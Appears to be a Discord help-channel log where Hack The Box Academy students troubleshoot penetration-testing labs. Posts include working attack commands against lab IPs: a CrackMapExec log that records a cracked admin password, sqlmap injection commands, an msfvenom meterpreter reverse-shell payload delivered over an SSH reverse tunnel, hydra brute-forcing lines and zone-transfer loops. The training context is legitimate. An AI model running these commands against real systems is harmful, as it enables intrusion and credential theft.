@storm jackal: ||DEBUG Started thread poller DEBUG:root:Error creating SMBv1 connection to 10.129.171.227: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'") DEBUG Error creating SMBv1 connection to 10.129.171.227: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'") DEBUG:root:Error retrieving os arch of 10.129.171.227: Could not connect: [Errno 111] Connection refused DEBUG Error retrieving os arch of 10.129.171.227: Could not connect: [Errno 111] Connection refused SMB 10.129.171.227 445 SKILLS-MEDIUM [*] Windows 6.1 Build 0 (name:SKILLS-MEDIUM) (domain:) (signing:False) (SMBv1:False) DEBUG:root:Error creating SMBv1 connection to 10.129.171.227: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'") DEBUG Error creating SMBv1 connection to 10.129.171.227: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'") DEBUG:root:add_credential(credtype=plaintext, domain=, username=admin, password=123456, groupid=None, pillaged_from=None) => 2 DEBUG add_credential(credtype=plaintext, domain=, username=admin, password=123456, groupid=None, pillaged_from=None) => 2 SMB 10.129.171.227 445 SKILLS-MEDIUM [+] \admin:123456 DEBUG:root:Stopped thread poller DEBUG Stopped thread poller||

#

It runs just fine against the target in the Network Services section

storm jackal
acoustic owl
rustic sage
#

thanks for helping

uncut mirage
storm jackal
robust mulch
#

Ugh, SomeOne please help? i have been stuck on the intoduction to linux module for 3 days now and cant figure out either how to properly install OpenSSH or how to properly connect, etc. i have done youtube tutorials ad tried many alternatives. If anyone is willing and or wanting to help a noob out, feel free to hit me up pleas. "Service and Process Management" P.S. I know i can provide much more details for better potential help though its just a lot what i tried so to now 1 message spam i will await

fathom pendant
#

Openssh should be preinstalled

echo jungle
#

anyone is free

dapper fable
#

hey im working through "attacking web application with ffuf" and for the life of me cant find the page with "You don't have access!".  The combination of subdomains, extensions, and directory list is taking far too long to scan, even without recursion.  i've also manually scanned the two subdirectories and found seemingly nothing underneath them.
EDIT: solved by following hint more carefully and/or using a (further) reduced wordlist

#

halp

robust mulch
#

Assuming that we are both correct and that htb academy was just throwing everyone a curveball by saying if it's not installed, then what? I tried connecting but I keep getting an error message, if you have some time I can go into more information?

dusky bear
#

Hey all - I'm on the responder module. When I launch my responder I'm getting a different IP then the one given by openVPN. Is that correct? If so I'm not receiving any events when trying complete the challenge capture. Any tips on how to get Responder working?

robust mulch
#

+HelpPlease *Linux Fundementals *Service and Process Management"
sytemctl start ssh _______> "AUTHENTICATING FOR org.freedesktop.systemd1.manage-untits +++ " ____> Authentication is required to start 'ssh.service'.
Authenticating as: ,,, (htb-ac714580)
Password:
polkit-agent-helper-1: pam_authenticate failed: Authentication failure <I am using the provided - HTB
@cademy_stdnt! |> <I dont remember if i changed it but if not prompted then i havent> #1024429874246590575

golden vortex
#

I was going to buy the student monthly subscription but it wont let me but it. Who do i need to contact?

vital adder
#

for that you need a student email but your college need to be in htb list

#

if is it isn't you can contact support to add your college to htb list

golden vortex
#

How would I contact support?

vital adder
vital adder
#

also if you have adblock on it cloud block this

dapper fable
vital adder
echo jungle
#

ok

#

i had but solved

#

next time i will

#

thnx

vital adder
# dapper fable final section: skills assessment

and that's question 3 right? i can't remember but i think question does give you some example extension right? then one of that shuld worked also i did noted down there could be a bug in this if you can't find anything try spam restart the target machine a few time (4 work for me)

simple merlin
#

Hi "Skill Assesment - Broken authentication", someone ?

vital adder
#

sure shoot me a dm

robust mulch
#

#UPDATE# To get authenticated withouth the password i was forggeting sudo lol but still seeing "journalctl -u ssh.service --no-pager" "No journal files were found "No entries" so i am assuming that i may have not connected properly

dapper fable
vital adder
rustic sage
#

There seems to be a problem with the target machine in the skill assessment - website in the module login brute forcing. The IP:port is no longer accessible. I have tried to reset the target multiple times. But nothing seems to work anymore.

velvet atlas
#

password attacks lab- med skills assessment. I have seen a ton of people ask the same question, but no answers likely to spoiler. Stuck after getting the 2nd user. Thought I knew the way, but its been 2 days messing with it and no luck. anyone for a ping?

rustic sage
#

In this case I am trying to access 138.68.164.196:31389. But it's not loading anymore.

vital adder
rustic sage
#

Could I be that i am now somehow locked out due to resetting the target too many times or whatnot?

#

+locked out

vital adder
#

if you then you are the first but i think nope

#

try refresh the page and spawn another target

#

if that still doesn't work you can use my target

rustic sage
#

Yeah tried that multiple time. Didn't work. But now I have one that seems to work.

vital adder
velvet atlas
#

yea i assumed I needed to crack the pw to 1 like it was in the module. but that doesnt work, been reading about other possibilities. not sure what else to even try

vital adder
#

also you mean the user that start with an ||d|| right?

velvet atlas
#

yes, looked thoroughly through what they have done, and have available to them. seemed like it just needed to crack the key- but no go

rustic sage
vital adder
vital adder
dapper fable
rustic sage
scarlet sapphire
#

module:Using CrackMapExec
Skill Assessment
Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.
I need some help i cant find any more accounts to get access to sql01 can u give me some hints

elfin nacelle
#

Hello, I havent been unsuccessful at completing sqlmap case 8.

Ive tried the following commands:

sqlmap -r request.txt --csrf-url= http://161.35.41.48:30009/case8.php --csrf-token= S56J2VYC34zZPyLxHMQRLHjUWUdX8sRzRMnHY8COnw --cookie=q57abl4kklnsb1psr6565o4bdk

sqlmap -r request.txt --csrf-url= http://161.35.41.48:30009/case8.php --csrf-token= S56J2VYC34zZPyLxHMQRLHjUWUdX8sRzRMnHY8COnw --batch --dump -v 3 --level 5 --risk 3 --cookie=q57abl4kklnsb1psr6565o4bdk

Can someone provide me a hint or nudge me in the right direction?

robust mulch
#

hey guys, i know my question isnt really all that intresting and maybe its somethng stupid easy but i just cant seem to figure it out. if someone, anyone can please dm me that would be great. until then, SoloLearn since its a bit for noob friendly. I already paid over 500 into HTB so backing out is not an option. For more info on question topic etc.. see the most previous post from me

autumn pilot
#

what?

sterile temple
#

PIVOTING, TUNNELING AND PORT FORWARDING. Im on the last question, where i need to get the flag from the Domain Controller, i think i already have the IP of the machine but i cannot manage to hace access. Im using netsh on the 2 and the 3 machine to get access to the Domain Controller (the 4 machine) it is possible that I am doing more that i'm suppose to hahaha i'm missing something. any help is appreciated guys

balmy radish
dim wolf
rustic sage
#

hey guys, im new so i have no idea how to hack im here to learn so can anyone help me with what i have to do for first tat would be great thanks to yall!

red obsidianBOT
rustic sage
#

Thank you!

#

i dont get what to do at the first answer

#

anyone can help me?

thorn urchin
chilly forge
#

Try the pentest process module under the pentesting path. Should be a decent start

thorn urchin
chilly forge
#

Hi, could someone help me with the password cracking module? If I use hashcat on the resource password list with the provided custom rules I end up with >90000 passwords. After 2 hours the machine and target timeout, but Hydra or CME are still running. This is the third time I've waited 1.5+ hrs for a nothing burger. I must be doing something wrong.

rustic sage
chilly forge
#

DM me

thorn urchin
chilly forge
#

SSH

thorn urchin
#

wrong answer

chilly forge
#

"Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer." this is the question

thorn urchin
#

ssh is super slow to brute you basically never want to target it for cracking like that

#

I know what the question is. Its lying to you.

chilly forge
#

i use hydra -l "sam" -P list ssh://targetIP

#

What?

#

so i use winrm or smb to crack the pw?

thorn urchin
#

dont brute ssh

#

can still use hydra

chilly forge
#

Wow, they could've mentioned that lmao

thorn urchin
#

just dont go after ssh

#

its a trick question

chilly forge
#

What service would you suggest? SMB?

thorn urchin
#

teaching you the best way to brute ssh is to brute something else

#

thats up to you and your enumeration

chilly forge
#

AH alright

#

I see

#

Wow thanks for that info!

thorn urchin
#

even the right answer though will still take 30-45 minutes as a heads up

chilly forge
#

That's alright 😛 I'm used to waiting haha

devout torrent
#

If you remove all inputs shorter that 7 letters it takes you less than a minute

dim wolf
#

if you remove the first 17000 or 150000 passwords hydra will get a hit faster

thorn urchin
#

while true I dont like those cause its a bit too much "meta" knowledge. Real world you wouldnt arbitarily do that unless you had extra information to indicate it was a good idea(like pulling the password policy)

dim wolf
#

i sorted and uniqued the list so i had significantly reduced the keyspace, then i chopped the entire list into 9 different chunks and brute forced each chunk

#

hydra didn't brute force the password.

#

not sure what happened there but i checked with grep later and the password was in that list...

devout torrent
#

I had some weird issues sometimes with brute forcing on my own machine, but it worked in pwnbox, so now everytime a module wants me to brute force a large file I just go on pwnbox

scarlet sapphire
#

module:Using CrackMapExec
Skill Assessment
Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.
I need some help i cant find any more accounts to get access to sql01 can u give me some hints

timber hatch
#

Could somebody check at the modul PIVOTING, TUNNELING, AND PORT FORWARDING , Section Remote/Reverse Port Forwarding with SSH if he/she can get a Meterpreter Session Established?

Because i try since 2 or 3 days and it does not work...somehow i believe this is not working for anybody...

simple zephyr
#

AD Enumeration & Attacks - Skills Assessment Part II

Can someone DM me I am stuck on the second to last question trying to get to DC01

timber hatch
#

InteralIPofPivotHost = 172.16.5.129
ipAddressofTarget = The target is spwan

is that right?

placid quest
#

@timber hatch yes

vital adder
woeful ermine
#

the target is in the internal network

#

use netstat to see established connection. Dont just go ahead and copy past what you see in the module

simple zephyr
dim wolf
#

updating the activity log is probably the most annoying thing

woeful ermine
#

no

#

obviously not

#

it should be in the same subnet

timber hatch
#

yes then your statement "pivot is the one spawned" is simply wrong or misleading....

woeful ermine
#

how?

timber hatch
#

InteralIPofPivotHost = 172.16.5.129
ipAddressofTarget = The target is spwan

#

reagrding to my question

woeful ermine
#

ok as I remember

#

you need to get an ip which is the pivot

#

and then start listening that ip and attackin the target over it

#

the subject is pivoting

#

so they want from you to use the pivot to attack internal network over it

timber hatch
#

yes that is all clear for me

unreal grail
#

If someone has completed the CrackMapExec Skill Assessment please hit me up 🙂

woeful ermine
timber hatch
#

the pivot host has two ips

#

an internal and the one spawned

woeful ermine
#

everything has it like that

#

you have a computer

#

you are connecting to a router

#

and when you open a website the website gets the ip from the router

#

so everyone connected to the that router has that same ip

#

but you have another ip in the network so router knows who to send the information

#

let say your phone also connected to the same router

timber hatch
#

Look, here are my settings:
Target spwawned: 10.129.121.188
msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129-f exe -o backupscript.exe LPORT=8080
scp backupscript.exe ubuntu@10.129.121.188
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.121.188 -v

Here are the Commands regarding HTB:
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InteralIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
scp backupscript.exe ubuntu@<ipAddressofTarget>:~/
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

woeful ermine
#

and what is the problem ?

unreal grail
#

I still have this error when trying to authenticate using the MSSQL protocol. I tried to specify the domain, but this does not work. Any idea why?ERROR(SQL01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication

timber hatch
woeful ermine
unreal grail
timber hatch
#

lol. ok...i have solved it...haha
i had to manually execute the backupscript.exe file at the windows host...i tought somehow this will somehow be triggered with a command above...

#

never mind...

fresh reef
#

o7 HTB, On Pivoting, Tunneling, and Port Forwarding Skill assessment and have lsasso'd some cred for v*... I'm now stuck figuring out my next move towards the DC....also on another now How do we id a DC in our pentesting context - "from outside peering in"?

ivory dock
#

Regarding the reverse port forwarding with SSH section in the "pivoting, tunneling and port forwarding" module, why do we have to use the reverse_https payload? I'm not understanding why a meterpreter reverse_tcp payload isn't working (I tried it and got nothing back).

fresh reef
#

First think about the direction of the port

#

Then consider why wede want to encrypt our exfil & infil traffic

#

Lastly this allows us to somewhat persist poet initial connection aswell as utilize our attk host directly

#

As far as non response goes: reset and follow the steps, analyzing each as shown in the lab's pretext

simple zephyr
#

I think that after active directory I am glade that web proxies is next lol that. AD was brutal.

quasi wave
#

I'm having trouble with finding the waldo.txt file in the Finding Files and Folders section of Intro to Windows CMD line

fresh reef
quasi wave
#

if I type:

where /R C:\Users\ waldo.txt

#

it doesn't work

#

I get an error

fresh reef
fathom pendant
#

try where /R c:\

fresh reef
quasi wave
#

I tried that as well

#

it still got me an error

fathom pendant
#

what is the error?

fresh reef
#

whats the error?

quasi wave
#

Where Object: A positional parameter cannot be found that accepts argument 'waldo.txt'

#

even if I do it recursively from C drive

#

should I restart machine?

dim wolf
#

doing attacking enterprise networks and SQLMap is having a really bad time on ir.inlanefreight.local

fathom pendant
#

see if doing the where /R c:\ *.txt to see if it finds any .txt files

quasi wave
#

didn't get me results

fresh reef
#

reset and hold for like 5 mins

fathom pendant
#

try restarting machine; remoting back in; and try again

quasi wave
#

ok thanks

fathom pendant
#

you can also try doing echo 123 > test.txt and run the where command on the test.txt

#

to see if it's just being fully weird

dim wolf
#

that section is... weird

#

i ended up finding waldo.txt ||on a different vm||

fresh reef
#

0.0

#

Awesome glad you got it 😄

quasi wave
#

ok so I started a new machine and it still didn't give it to me

dim wolf
#

SQLmap cannot work with this machine, i will have to use regular sql injection

#

Except i'm getting a proxy error now so i can't even do sql injection

quasi wave
#

I assume I need to do the where command like where /R C:\Users\ waldo.txt

then get location of file then type:

find "HTB" C:/Users\[file-path-to-waldo.txt]\waldo.txt

#

but the problem is any variation on the where command isn't working

#

but am I right about the concept?

fathom pendant
#

type will type out the waldo.txt

#

unless it is specifying using the find command

quasi wave
#

its specifying find

fathom pendant
#

then yes you would use find "string" C:\path\to\file.txt

quasi wave
#

ok well that's not working so what do I do?

#

because where won't find the file

fathom pendant
#

move on it seems like this is a common issue

#

it seems like waldo.txt can be found in another part of the module

quasi wave
#

ok what's the flag just so I can enter it in? can you dm it to me?

fathom pendant
#

no

quasi wave
#

ok

fathom pendant
#

you still have to find it yourself

quasi wave
#

ok

fathom pendant
#

but it sounds like waldo is on a different machine in that module

quasi wave
#

ya because there's a Flag.txt.txt file that is NOT "waldo" in the C:\ folder and the contents are NOT the flag of this module

#

so how do I go about finding the flag? any hints based on that?

#

maybe two VMs were swapped by accident?

dim wolf
#

my advice: go through the next sections and come back to that question later.

quasi wave
#

ok thanks

#

ok

dim wolf
#

would like to know why i'm getting "No route to host (Host unreachable)" in Burp Suite against ||monitoring.inlanefreight.local|| in Attacking Enterprise Networks - Web Enumeration & Exploitation

#

SQLMap was also very slow and getting a lot of 502 responses

#

the host is up and i can issue commands

dim cosmos
#

hi all

carmine quail
dim wolf
#

yes

rain rivet
#

Hydra question for you experts! (Trying it against Pennyworth in Startingpoint Tier1). "hydra http-form-post -U" lists several optional parameters, one of which I'm interested in:
"2= 302 page forward return codes identify a successful attempt".

Has anyone used/gotten this to work? My string of

"/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError"

is all well and good, but the actual success produces a redirect, and I can't figure out the command line syntax. (BTW I know the username/password, I just want to practice getting hydra syntax correct) Right now the only way I can find the valid username/password is to set "-t 1", number of threads to 1, with -v -V verbose so I can see the redirect response happen right after the candidate username/password attempt.

quasi wave
#

hi why isn't there a lot of tier III and IV stuff? Is more gonna be added soon?

#

and will tier III and IV stuff ever have job-role or skill paths or be a part of skill paths?

#

I think that if there were more advanced skill paths that would be sick

raw heath
#

I have a question, I am very new to this kinda thing but I have I incountered a question on a module quiz that said “find out the machine hardware name” my first answer was amd64 and this was incorrect, so I tried x86_64 and this was correct. My question is why? Are there different amd hardware options that are not x86? I am confused, I tried google but it basically said amd64 and x86_64 are the same thing.

fathom pendant
#

because x86_64 is basically the actual architecture

#

for instance when I run uname -a on my vm I get a bunch of stuff

#

but if you look at uname --help it shows that there is a tag -m that is specifically to output the machine name

#

also if you look at the help command it tells you that uname -a prints out the tags beneath it in that order; omitting the -p and -i if they come back as "unknown"

raw heath
#

I see, I think that uname —help is going to be my new best friend. Thanks for helping me get all this lined out!

fathom pendant
#

eh you rarely need to use uname unless you're verifying something or are remoted in and searching for vulnerabilities to exploit

dim wolf
fathom pendant
#

also a HUGE thing to note; with examples sometimes you can't recreate them 1 to 1 in the practice; sometimes they want you to take the knowledge and do some minor abstraction to make it work for your system

fathom pendant
dim wolf
#

exam time

fathom pendant
#

gl :) but I'd say take a few days to go over your notes; rewrite any old notes with new knowledge, etc

#

like for me my common note for cme smb is ALWAYS ADD --local-auth

#

that gets me SO MUCH

dim wolf
#

i feel like i need practice first so i'm gonna drop into the dante prolab and do it as if it's an actual engagement

fathom pendant
#

ThumbsUpCat big tip especially; write your exploit path as you go through and exploit

dim wolf
#

i noticed that writing the report as you go is a theme

fathom pendant
#

well think about it this way; if you spent 2-3 hours exploiting how likely are you going to remember your initial point of entry

dim wolf
#

i can't remember a lot of things

#

lol

fathom pendant
#

SO writing as you go helps a TON

#

my memory goes like "what did I... Oh yeah"

dim wolf
#

definitely going to practice notetaking and documentation

fathom pendant
#

mhm Do it on live boxes too

#

I'd say; do dante - reset progress, and using your Documentation, seeing if you can repeat the pwn

dim wolf
#

sounds good

fathom pendant
# dim wolf sounds good

mind if I DM you about the attacking common services module SQL regarding which wordlist to use? the provided wordlist seems to not yield results

#

nvm

#

it seems like hashcat didn't like me :(

#

but john did :D

fathom pendant
#

module: Attacking Common Services; SQL Database
Cannot seem to login or auth using sqsh in the pwnbox if someone could direct me to what I'm doing wrong that'd be great

pliant sage
#

Has anyone ever had the "cannot spawn target" error on htb?

fathom pendant
autumn pilot
fathom pendant
fathom pendant
#

but again I'm all for User Error

autumn pilot
#

have you tried with mysql remote host connection command?

fathom pendant
autumn pilot
#

where exactly you are lost at, the syntax or something else?

fathom pendant
#

syntax probably

fathom pendant
autumn pilot
#

nice

fathom pendant
brisk geode
#

how to find the hostname of a host from its ip in an ad?

as an example i have 3 ip's: 172.16.7.3, 172.16.7.50, 172.16.7.60

how to find out which host is SQL01

autumn pilot
#

cme?

fathom pendant
#

^

autumn pilot
#

open ports?

fathom pendant
#

yeah if you do a script nmap scan doesn't it just flat out tell you?

brisk geode
fathom pendant
#

try specifically looking for the SQL ports

dim cosmos
#

linux priv esc makes a nice easier change from AD lol

brisk geode
fathom pendant
dim cosmos
#

yeh my brain runs out of RAM for a lot of the AD stuff lol

rustic sage
#

Is there a good way to take notes.
Currently I use obsidian on windows and then defender start deleting file which is liked with gitlab for backup. But the file keeps deleting.

knotty quest
fathom pendant
fathom pendant
hoary mist
#

Even after adding the DNS to the /etc/hosts file I can't open the website or more specifically the website is very slow and not fully connecting

fathom pendant
rustic sage
#

I did it but the obsidian creats some kind of restore file and defender starts notifications for viruses found

hoary mist
#

umm don't know bout module it's a machine called stocker

#

From htb machines

fathom pendant
hoary mist
#

Sorry I am new and didn't know where to get help this one was active so texted here

fathom pendant
fathom pendant
#

:)

hoary mist
#

Thank you

knotty quest
fathom pendant
knotty quest
fathom pendant
#

using your work system for notes

#

spicy

knotty quest
# fathom pendant using your work system for notes

Mainly temporary storage and experimentation. Wouldn't recommend using your work system for permanent notes or anything you want to keep, the IT group is worse than AV, they will log on to your computer and delete stuff 😅

fathom pendant
#

duh

vast lichen
#

can anyone help me in COMMAND INJECTIONS Skills Assessment ?

fathom pendant
#

also don't ask to ask; just ask your question that way if you step away and come back it may be answered

fathom pendant
#

just try and avoid having spoilers in your post

sly reef
#

hey marcie

fathom pendant
# sly reef where are u at

it avoids having to answer questions like this ^ if you just asked your question you could have had your question answered faster :)

sly reef
#

tru

fathom pendant
vast lichen
vast lichen
# sly reef where are u at

At the beginning, I tried a lot to discover the vulnerability of injecting commands with many characters in advances search and to parameter, but unfortunately I could not find out the correct character, is there anyone to guide me?  I just need a little hint or clarification to get me going

sly reef
#

where are u injecting what

fathom pendant
#

Have you tried everything the module/section has taught you so far?

ripe terrace
#

No idea why, but I'm stuck in a really stupid spot on AD Enumeration & Attacks - Privileged Access.

The last question on leveraging SQLAdmin rights says to 'Authenticate to 10.129.197.111 with user "damundsen" and password "SQL1234!"'... Authenticate how exactly? RDP doesn't make sense, as I need to run myssqlclient.py from my Linux box, and SSH doesn't work. Any pointers?

vast lichen
sly reef
#

kindly show us the burp petitions ur using

fathom pendant
#

^ unless you are not using burp; in which case - that is why you are unsure where to go

#

you aren't using a proxy to capture input to see what is being done to it

vast lichen
vast lichen
sly reef
#

bro, copy paste it

fathom pendant
#

he can't paste screenshots

#

he has not verified his htb main account

#

:)

#

that is probably the other part of issues

#

you can paste blocks of code with ``` at the start and end of the code

sly reef
vast lichen
ripe terrace
vast lichen
sly reef
vast lichen
sly reef
#

no

#

only the character

#

should be enough for the payload to returnerror

vast lichen
#

I will try, thanks @sly reef

hot solar
#

Hey

turbid kraken
#

Hey guys, so I'm currently doing some DNS recon (both footprinting and web recon module).
As it stands, I'm doing axfr (zone transfer) tests one subdomain at a time. is it possible to dump bulk axfr requests to a list of subdomains? (eg. recursive axfr recon?)
Maybe there is a tool I am missing? Thanks!

ripe terrace
#

E.g., along the lines of for s in $(cat subdomains.txt); do dig axfr $s @x.y.z.w; done

turbid kraken
ripe terrace
turbid kraken
ripe terrace
#

Yup

pliant sage
#

is it normal that I can't load the websites from the attacking wordpress module in my browser? curl works fine but if i request it in my browser it hangs

fathom pendant
#

are you using a proxy still?

#

:)

turbid kraken
# turbid kraken Hey guys, so I'm currently doing some DNS recon (both footprinting and web recon...

[SOLVED] So for anyone searching for the same thing I was and finding my message here is an answer:

Get subdomains to a file:
dig axfr <domain.xyz> @<domain/IP> | grep '<A>' | cut -d'6' -f1 | uniq > subdomains.txt && cat subdomains.txt

Check zone-transfer for all subdomain in file:
for s in $(cat subdomains.txt); do dig axfr $s @<domain/IP>; done | grep '<A>' | cut -d'6' -f1 | uniq > RecSubdomains.txt && cat RecSubdomains.txt

pliant sage
dim cosmos
#

glad id done the attacking common apps module before the linux priv esc skills assessment LOL

fathom pendant
fathom pendant
dim cosmos
fathom pendant
dim cosmos
#

Yep sounds good, sometimes the best thing to do is take a break

steady light
#

Hey guys, I've been doing Password attacks module, Password Mutations section and I've created a mutated list with 'sort -u' options and it's taking hours to brute-force the ssh, maybe there's a faster solution?

vital adder
glossy cipher
vital adder
vital adder
stuck delta
#

Helo.. I take a windows fundamental module, but when I want to connect xfreerdp, connection for login was refused, need your help please..

paper cliff
#

Hello guys,
Can anyone give me some hints about "Web Service & API Attacks - Skills Assessment"?
I read the forum answers but I didn't get it

glossy cipher
#

hi im stucked on AD Enumeration & Attacks - Skills Assessment Part I
Q3 Crack the account's password. Submit the cleartext value.

basically i am following the steps in Kerberoasting - from Windows

but everytime i do the kirbi2john i get a blank crack_file

lethal atlas
paper cliff
ornate rivet
#

Hello good people and fellow folks, I come with a question. Recently I have started the HTTP module and literally could not progress since the entire first question is unclear to me. It asks me to retrieve the flag but...how? I tried every command I found in the description/explanation. Link to the module: https://academy.hackthebox.com/module/35/section/219
I would appreciate all help.

fathom pendant
#

Hey @vital adder I'm stuck on the common services module ; SMTP I'm supposed to use the provided pw list right, not sure what service though I'm meant to go after ... (Or if I'm even doing the right cmd)

steady light
#

saved me like an hour

twilit gull
#

Hey did anyone complete shells and payloads host 3??

steady light
faint rampart
dim wolf
vital adder
twilit gull
#

the hint is to use eternal blue but it is now working

lethal atlas
fathom pendant
twilit gull
fathom pendant
#

And using the sneaky port

fathom pendant
vital adder
vital adder
twilit gull
fathom pendant
#

Also

steady light
twilit gull
fathom pendant
#

You should be using the provided host to attack the systems

twilit gull
#

Yes, I got a shell using .aspx file and also executed single commands using the exploit

#

but they are not helping me to read the file

twilit gull
fathom pendant
#

You said pwnbox so are you connected to the system @ 10.129.x.x

#

And attacking from there?

#

Or just using the browser

#

That is my confusion here

steady light
#

On the 3 host you don't need to upload a shell

#

You can get system shell via exploit in the hint

#

msf will help

#

I just redid it and everything worked

fathom pendant
#

^

twilit gull
#

I used pwnbox, used rdp to connect to host as per the requirement and attacking system from that machine

twilit gull
steady light
twilit gull
steady light
#

and what was the lhost you provided? did it start with 172...?

twilit gull
#

used eternalromance, eternalblue, double pulsar

steady light
#

try eternalblue_psexec

#

it's called similar to that

twilit gull
steady light
#

make sure to use the correct LHOST, check ifconfig and use the one which starts with 172

twilit gull
steady light
#

but it's not the same as rhost

twilit gull
#

okay mate, I will give a try and get back to you. give me 5 minutes

steady light
#

the correct ip is ens224 interface when you enter ifconfig

#

this happens cz you can only interact with the target with internal network

twilit gull
twilit gull
#

Finally I got it, thank you...

steady light
#

no problem!

wooden sonnet
#

#cwes #WebRequests #POST

Hello everyone,

I cant move on till i understand how to do this method so can somebody please help me.
I am trying to get authenticated using the cookie inside the devtools but i dont know why it isn't working.
I go over to the storage tab and i enter the correct cookie name with the cookie value and then i hit refresh on the webpage and nothing happens. what am i doing wrong???

i followed these instructions >> " Now, let's try to use our earlier authenticated cookie, and see if we do get in without needing to provide our credentials. To do so, we can simply replace the cookie value with our own. Otherwise, we can right-click on the cookie and select Delete All, and the click on the + icon to add a new cookie. After that, we need to enter the cookie name, which is the part before the = (PHPSESSID), and then the cookie value, which is the part after the = (c1nsa6op7vtk7kdis7bcnbadf1). Then, once our cookie is set, we can refresh the page, and we will see that we do indeed get authenticated without needing to login, simply by using an authenticated cookie: "

void echo
#

Hi guys, How are all?

#

I don't understand.

unreal crescent
#

Man I am all messed up in the Active Subdomain Enumeration one about ZoneTransfers... I can't even ping the machine it wants for the fully qualified domain name, let alone get nslookup to stop printing out the freaking IP address backwards

dim wolf
#

i don't think you can ping any of them besides the spawned VM

unreal crescent
#

Yeah openvpn is connected

vital adder
#

crackmapexec doesn't have a method to output stuff into a file and the > should work but this is basically dumping everything in to a file so if you got verbose it's would be kinda hell

unreal crescent
#

nslookup 10.10.34.136 returns server can't find 136.34.10.10.in-addr.arpa: NXDOMAIN

dim wolf
#

yea you can't ping that

ivory dock
#

In the Pivoting, Tunneling and Port Forwarding module, shouldn't this be RPORT?

vital adder
#

@unreal crescent if you add you the target machine ip info your hosts file with a domain name you can still ping at domain but all subdomain ip is dead so it's recommended to use tool for live subdomain like nslookup